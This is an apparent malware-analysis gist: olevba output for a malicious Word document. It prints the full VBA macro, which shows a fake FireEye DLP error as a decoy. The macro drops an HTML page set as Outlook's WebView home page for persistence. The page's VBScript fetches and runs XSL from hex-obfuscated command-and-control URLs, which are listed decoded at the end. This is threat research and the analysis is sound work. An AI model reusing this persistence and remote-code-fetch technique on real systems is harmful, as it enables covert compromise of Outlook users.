Created
October 1, 2020 01:41
-
-
Save JohnLaTwC/6cf34541ba597c6c28b2465de4ffd32e to your computer and use it in GitHub Desktop.
A very interesting DOCX no?
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools | |
=============================================================================== | |
FILE: 38bd9e647609d121621fc817ab2fdb5b58e9a2ac6c2f6640c36bc2164e7d54f1 | |
Type: OpenXML | |
------------------------------------------------------------------------------- | |
VBA MACRO ThisDocument.cls | |
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument' | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
Private Declare PtrSafe Function ExpandString Lib "kernel32" Alias "ExpandEnvironmentStringsA" (ByVal lpSrc As String, ByVal lpDst As String, ByVal nSize As Long) As Long | |
Sub Document_Open() | |
On Error Resume Next | |
Set ax = CreateObject("Microsoft.Windows.ActCtx") | |
m = "<?xml version=""1.0"" encoding=""UTF-16"" standalone=""yes""?><assembly xmlns=""urn:schemas-microsoft-com:asm.v1"" manifestVersion=""1.0"">" | |
m = m & "<assemblyIdentity name=""Microsoft.VisualBasic"" version=""10.0.0.0"" publicKeyToken=""B03F5F7F11D50A3A"" />" | |
m = m & "<clrClass clsid=""{E27D25D3-14B1-3960-8D23-A9FAB9BF32BC}"" progid=""Microsoft.VisualBasic.Devices.Computer"" threadingModel=""Both"" name=""Microsoft.VisualBasic.Devices.Computer"" runtimeVersion=""v4.0.30319"" /></assembly>" | |
ax.ManifestText = m | |
Set c = ax.CreateObject("Microsoft.VisualBasic.Devices.Computer") | |
Set k = c.Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Office\\" + Application.Version + "\Outlook\WebView\Inbox") | |
Dim i As String, o As String, rs As Long | |
i = R("FL") | |
rs = ExpandString(i, o, rs) | |
o = Space$(rs) | |
rs = ExpandString(i, o, rs) | |
k.SetValue "URL", "file:///" & o | |
WB o, DH(R("Hyperlink Base")) | |
Set oh = CreateObject("MSXML2.XMLHTTP") | |
oh.Open "GET", R("U"), False | |
oh.Send | |
Dim Msg, Style, Title, Help, Ctxt, Response, MyString | |
Msg = "Error: FireEye DLP parsing failed." | |
Style = vbOKOnly | |
Title = "FireEye DLP" | |
Help = "DEMO.HLP" | |
Ctxt = 1000 | |
Response = MsgBox(Msg, Style, Title, Help, Ctxt) | |
ActiveDocument.Bookmarks("Page1").Range.Font.Hidden = False | |
End Sub | |
Private Sub Document_Close() | |
On Error Resume Next | |
ActiveDocument.Bookmarks("Page1").Range.Font.Hidden = True | |
Documents.Save NoPrompt:=True | |
End Sub | |
Private Sub WB(file, bytes) | |
On Error Resume Next | |
Set s = CreateObject("ADODB.Stream") | |
s.Type = 1 | |
s.Open | |
s.Write bytes | |
s.SaveToFile file, 2 | |
End Sub | |
Private Function DH(hex) | |
On Error Resume Next | |
Set EL = CreateObject("Microsoft.XMLDOM").createElement("tmp") | |
EL.dataType = "bin.hex" | |
EL.Text = hex | |
DH = EL.nodeTypedValue | |
End Function | |
Function R(sPropName As String) As Variant | |
On Error Resume Next | |
Dim bCustom As Boolean | |
Dim sValue As String | |
On Error GoTo ErrHandlerRead | |
sValue = ActiveDocument.BuiltInDocumentProperties(sPropName).Value | |
R = sValue | |
Exit Function | |
ContinueCustom: | |
bCustom = True | |
Custom: | |
sValue = ActiveDocument.CustomDocumentProperties(sPropName).Value | |
R = sValue | |
Exit Function | |
ErrHandlerRead: | |
Err.Clear | |
If Not bCustom Then | |
Resume ContinueCustom | |
Else | |
R = "" | |
Exit Function | |
End If | |
End Function | |
############################################################################ | |
## in docProps/app.xml [tag={...}HyperlinkBase, text below: | |
##  | |
################################################################################ | |
<html> | |
<head> | |
<title>Inbox</title> | |
<script id="EventHandlers" language="vbscript"> | |
Dim tm, idx, dm, ft, tk, et | |
et = 1601428135 | |
tk = "98ITEUFD" | |
ft = 300000 | |
dm = Array("6800"&"740"&"074007000"&"73003"&"a"&"0"&"02"&"f0"&"02f"&"007"&"50073"&"00640"&"06"&"1"&"0"&"02d0"&"070006f0072007"&"40"&"0"&"610"&"06"&"c002e00"&"65007"&"3"&"00"&"72"&"0069002e0063"&"006f006"&"d002"&"f0"&"06"&"900"&"6e0"&"06"&"40"&"0650"&"07"&"8"&"0"&"02e"&"0070006800700"&"0","6"&"800"&"74007"&"4"&"0"&"07"&"00073003a0"&"02f00"&"2f006c0"&"0690"&"0620"&"0"&"720"&"0"&"61"&"0072007900"&"2e006f0"&"07200"&"6"&"5006"&"9006"&"c006c00"&"79002e00"&"63006"&"f006"&"d0"&"02f006"&"9006"&"e0064"&"00"&"65007"&"80"&"02"&"e007"&"0"&"0"&"068007000"&"","680"&"074007"&"4007000"&"73"&"003a002"&"f002f"&"006d"&"00790"&"0"&"6800720"&"0"&"7"&"0006"&"c"&"006"&"10"&"0"&"6e"&"0"&"02e0063006f0"&"0"&"6d"&"002f0"&"069006e0"&"06400650078"&"0"&"02"&"e"&"007"&"0"&"006"&"80"&"07000","6800"&"740"&"0740070007"&"300"&"3a002f002"&"f00"&"7"&"0006f0"&"0"&"63"&"0"&"0"&"2"&"e006600740070002d0"&"06"&"e"&"006"&"1003200"&"2e00620061"&"007"&"9006500"&"72002"&"e"&"006300"&"6f006d002"&"f00690"&"06"&"e0"&"0"&"64006500"&"780"&"02e0"&"0700068"&"00"&"7000","68007"&"4"&"007400"&"70007"&"3003"&"a002f002f00"&"7"&"30"&"065"&"0"&"0720076006"&"90"&"06"&"3006"&"5"&"007"&"3002e006c00"&"79"&"00720"&"06"&"90"&"0"&"7"&"3002e00"&"630"&"0"&"6f0"&"06d002f0"&"06"&"90"&"06e0064006"&"50"&"07800"&"2e0070"&"00"&"6"&"8007000","680074007"&"400"&"7"&"000730"&"03a"&"0"&"02f002f007"&"a003"&"2"&"0"&"0"&"2e"&"00"&"6"&"3007"&"30"&"02e"&"006e"&"007600"&"69006"&"4"&"0069"&"0061"&"006"&"70072"&"0"&"069"&"0064002e00"&"6e00"&"6"&"500"&"74"&"002f0069006e006"&"40"&"06500"&"7800"&"2e0070006800700"&"0","6800740"&"07400"&"7"&"000"&"73"&"00"&"3a0"&"0"&"2f002f0064006"&"5007600770"&"06"&"50"&"06"&"200"&"2e"&"0"&"0610073"&"0"&"063"&"0"&"0"&"63"&"002"&"e00"&"6d"&"0"&"065"&"0"&"02f00"&"690"&"06e"&"00640"&"0650078002"&"e007000680"&"0"&"70"&"00") | |
Function DH(h) | |
On Error Resume Next | |
Set EL = ViewCtl1.OutlookApplication.CreateObject("Microsoft.XMLDOM").createElement("tmp") | |
EL.dataType = "bin.hex" | |
EL.Text = h | |
DH = CStr(EL.nodeTypedValue) | |
End Function | |
Sub T() | |
On Error Resume Next | |
window.clearTimeout(tm) | |
Set d = ViewCtl1.OutlookApplication.CreateObject("MSXML2.DOMDocument") | |
Set ho = ViewCtl1.OutlookApplication.CreateObject("MSXML2.XMLHTTP") | |
ho.Open "GET", (DH(dm(idx)) & "?token=" & tk & "&x"), False | |
ho.Send | |
d.LoadXML ho.responseText | |
d.transformNode d | |
If d.parseError.errorCode = 0 Then | |
Exit Sub | |
End If | |
If idx < UBound(dm) Then | |
idx = idx + 1 | |
tm = window.setTimeout("T", ft, "VBScript") | |
End If | |
End Sub | |
Sub Window_OnLoad() | |
On Error Resume Next | |
If (DateDiff("s", "01/01/1970 00:00:00", Now) > et) Then | |
Set ax = ViewCtl1.OutlookApplication.CreateObject("Microsoft.Windows.ActCtx") | |
m = "<?xml version=""1.0"" encoding=""UTF-16"" standalone=""yes""?><assembly xmlns=""urn:schemas-microsoft-com:asm.v1"" manifestVersion=""1.0"">" | |
m = m & "<assemblyIdentity name=""Microsoft.VisualBasic"" version=""10.0.0.0"" publicKeyToken=""B03F5F7F11D50A3A"" />" | |
m = m & "<clrClass clsid=""{E27D25D3-14B1-3960-8D23-A9FAB9BF32BC}"" progid=""Microsoft.VisualBasic.Devices.Computer"" threadingModel=""Both"" name=""Microsoft.VisualBasic.Devices.Computer"" runtimeVersion=""v4.0.30319"" /></assembly>" | |
ax.ManifestText = m | |
Set c = ax.CreateObject("Microsoft.VisualBasic.Devices.Computer") | |
Set k = c.Registry.CurrentUser.CreateSubKey("Software\Microsoft\Office\" + Mid(ViewCtl1.OutlookApplication.Version,1,4) + "\Outlook\WebView\Inbox") | |
Dim v: v = k.GetValue("URL") | |
k.DeleteValue "URL" | |
ViewCtl1.OutlookApplication.CreateObject("Scripting.FileSystemObject").DeleteFile(Mid(v, 9)) | |
Exit Sub | |
End If | |
tm = window.setTimeout("T", 5000, "VBScript") | |
End Sub | |
</script> | |
</head> | |
<body> | |
<object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"> | |
<param name="Namespace" value="MAPI"> | |
</object> | |
</body> | |
</html> | |
############################################################################### | |
https://usda-portal.esri.com/index.php | |
https://library.oreilly.com/index.php | |
https://myhrplan.com/index.php | |
https://poc.ftp-na2.bayer.com/index.php | |
https://services.lyris.com/index.php | |
https://z2.cs.nvidiagrid.net/index.php | |
https://devweb.ascc.me/index.php |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment